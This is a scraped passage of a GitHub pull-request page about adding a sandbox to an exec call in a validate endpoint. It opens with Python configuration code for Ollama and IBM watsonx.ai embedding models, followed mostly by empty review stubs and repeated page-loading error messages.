True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"
		},

		class SecurityViolation(Exception):
		"""Raised when code attempts to escape the sandbox or use blocked operations."""

ref: add sandbox to exec call in validate endpoint #10696

Are you sure you want to change the base?

ref: add sandbox to exec call in validate endpoint #10696

Uh oh!

Conversation

jordanrfrazier commented Nov 24, 2025 • edited by coderabbitai bot Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Summary by CodeRabbit

Uh oh!

coderabbitai bot commented Nov 24, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Walkthrough

Changes

Sequence Diagram(s)

Estimated code review effort

Possibly related PRs

Suggested labels

Suggested reviewers

Pre-merge checks and finishing touches

Pre-merge checks failed

Uh oh!

codecov bot commented Nov 24, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Codecov Report

Uh oh!

coderabbitai bot left a comment

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot left a comment

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

Choose a reason for hiding this comment

Uh oh!

coderabbitai bot Nov 24, 2025

jordanrfrazier commented Nov 24, 2025 •

edited by coderabbitai bot

Loading

coderabbitai bot commented Nov 24, 2025 •

edited

Loading

codecov bot commented Nov 24, 2025 •

edited

Loading